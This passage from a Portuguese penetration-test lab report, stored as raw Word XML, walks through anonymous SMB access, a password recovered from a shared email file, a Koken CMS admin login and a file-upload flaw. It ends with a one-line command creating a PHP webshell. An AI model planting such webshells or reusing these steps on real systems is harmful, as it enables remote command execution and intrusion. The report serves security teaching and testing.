    <w:p w14:paraId="63E6DCDB" w14:textId="77777777" w:rsidR="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F476C2" w14:textId="784E4415" w:rsidR="00F815F7" w:rsidRPr="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4EDDF1" w14:textId="4D7CCF7C" w:rsidR="00F815F7" w:rsidRPr="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A6E50B4" w14:textId="77777777" w:rsidR="00F815F7" w:rsidRPr="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E0C7BD3" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A sessão nula confirmada pelo enum4linux representa uma </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> crítica no serviço Samba, classificada como Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no OWASP Top 10 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF72504" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Acesso ao Compartilhamento SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475402B7" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Com o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> foi possível acessar o compartilhamento </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sambashare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de forma completamente anônima, sem necessidade de credenciais:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46374184" w14:textId="59278995" w:rsidR="00F815F7" w:rsidRPr="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F815F7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B701735" wp14:editId="2955BC5A">
            <wp:extent cx="5579745" cy="1677670"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="61555722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1677670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E1FA3D" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Dentro do compartilhamento foram encontrados dois arquivos de alto valor para a progressão do ataque:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178301FF" w14:textId="77777777" w:rsidR="00F815F7" w:rsidRDefault="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C49E548" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>mailsent.txt — arquivo de texto de 503 bytes, datado de julho de 2020.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708AF773" w14:textId="252D1BCF" w:rsidR="00F815F7" w:rsidRPr="00F815F7" w:rsidRDefault="00000000" w:rsidP="00F815F7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">wordpress.bkp.zip — arquivo de backup </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de 13,9 MB, datado de julho de 2020.</w:t>
      </w:r>
      <w:r w:rsidR="00EA346D" w:rsidRPr="00EA346D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA346D" w:rsidRPr="00F815F7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="409EF7F2" wp14:editId="03364419">
            <wp:extent cx="4685207" cy="3009900"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="7906638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4221" cy="3022115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F815F7">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F815F7">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EDBD04" w14:textId="1E43DCE8" w:rsidR="00DA7219" w:rsidRDefault="00DA7219" w:rsidP="00F815F7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="107935B2" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="150DAF14" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ambos os arquivos foram baixados para análise com o comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49025BB2" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Análise do Arquivo mailsent.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8495CD" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O arquivo mailsent.txt continha uma mensagem de e-mail trocada entre os usuários Agi Clarence e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Daisa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ahomi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. O conteúdo da mensagem revelou uma pista direta sobre a senha da usuária </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daisa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC01477" w14:textId="2BF85F1A" w:rsidR="00F815F7" w:rsidRPr="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F815F7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F5FF17C" wp14:editId="3A34E4C0">
            <wp:extent cx="4595995" cy="2497016"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5641978"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4213" cy="2501481"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="221AEFAD" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A expressão </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>babygirl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> foi imediatamente identificada como candidata à senha do painel administrativo do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Essa descoberta exemplifica o risco de armazenar informações sensíveis em compartilhamentos acessíveis anonimamente, caracterizando falha de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Identification</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Authentication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Failures</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no OWASP Top 10 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2579787D" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="40101F3D" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:t>7 EXPLORAÇÃO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B3A1B" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 Acesso ao Painel Administrativo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0940FA93" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Com as credenciais obtidas na fase de enumeração, foi realizado o login no painel administrativo do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> na URL http://192.168.56.102:8000/admin utilizando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD987EF" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>E-mail: daisa@photographer.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6040ADF2" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Senha: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>babygirl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04D0DD9A" w14:textId="77777777" w:rsidR="00AD472E" w:rsidRDefault="00AD472E" w:rsidP="00AD472E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FC5DF0" w14:textId="1DB24E19" w:rsidR="00AD472E" w:rsidRPr="00AD472E" w:rsidRDefault="00AD472E" w:rsidP="00AD472E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD472E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F180172" wp14:editId="73584DEC">
            <wp:extent cx="5579745" cy="3848100"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="322702425"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3848100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A0E1F" w14:textId="53D23B92" w:rsidR="00AD472E" w:rsidRPr="00AD472E" w:rsidRDefault="00AD472E" w:rsidP="00AD472E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD472E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29A37707" wp14:editId="22B34E5E">
            <wp:extent cx="5579745" cy="3837305"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1398704967"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3837305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E6754" w14:textId="218AEA6A" w:rsidR="00AD472E" w:rsidRPr="00AD472E" w:rsidRDefault="00AD472E" w:rsidP="00AD472E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD472E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19ADD91A" wp14:editId="3FBBC53F">
            <wp:extent cx="5579745" cy="3636010"/>
            <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
            <wp:docPr id="6851874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636010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="093B0C41" w14:textId="5F51C74A" w:rsidR="00AD472E" w:rsidRPr="00AD472E" w:rsidRDefault="00AD472E" w:rsidP="00AD472E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD472E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13CBB713" wp14:editId="3DF446ED">
            <wp:extent cx="5579745" cy="3792220"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="208394303"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3792220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1CDC52" w14:textId="58A009D9" w:rsidR="00AD472E" w:rsidRPr="00AD472E" w:rsidRDefault="00AD472E" w:rsidP="00AD472E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD472E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B7B73F9" wp14:editId="7BDAD2BE">
            <wp:extent cx="5579745" cy="2983865"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
            <wp:docPr id="81060443"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2983865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29439A9E" w14:textId="77777777" w:rsidR="00AD472E" w:rsidRDefault="00AD472E" w:rsidP="00AD472E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5DF9C0" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="2C43169D" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O login foi bem-sucedido, confirmando que a senha extraída do arquivo mailsent.txt era válida. O painel administrativo revelou as configurações do servidor: PHP 7.2.32, MySQL 5.5.5-10.0.38-MariaDB, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Apache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.4.18 no Ubuntu Linux e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ImageMagick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 6.8.9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C7530A" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 CVE-2020-37023 — Upload Arbitrário de Arquivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC95D7C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A vulnerabilidade CVE-2020-37023 afeta o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CMS versão 0.22.24 e permite que um usuário autenticado faça upload de arquivos PHP maliciosos através da função de importação de mídia, contornando as verificações de extensão do lado do servidor. A classificação CVSS desta vulnerabilidade é 8.8 (HIGH), enquadrada como CWE-434 — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Unrestricted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Upload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> File </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dangerous</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01141007" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O mecanismo de falha reside na validação insuficiente do tipo de arquivo: o servidor confiava na extensão informada pelo cliente sem verificação real do conteúdo via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>magic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bytes ou validação MIME </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>side</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Isso permitiu o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bypass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> da restrição de extensão.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B795EF" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2.1 Preparação do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12FFF747" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Foi criado um arquivo PHP mínimo para execução remota de comandos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BE0AC8" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRPr="00AD472E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD472E">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo '&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD472E">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD472E">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> system($_GET["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD472E">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD472E">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD472E">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD472E">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;' </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD472E">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt; /tmp/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD472E">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>webshell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
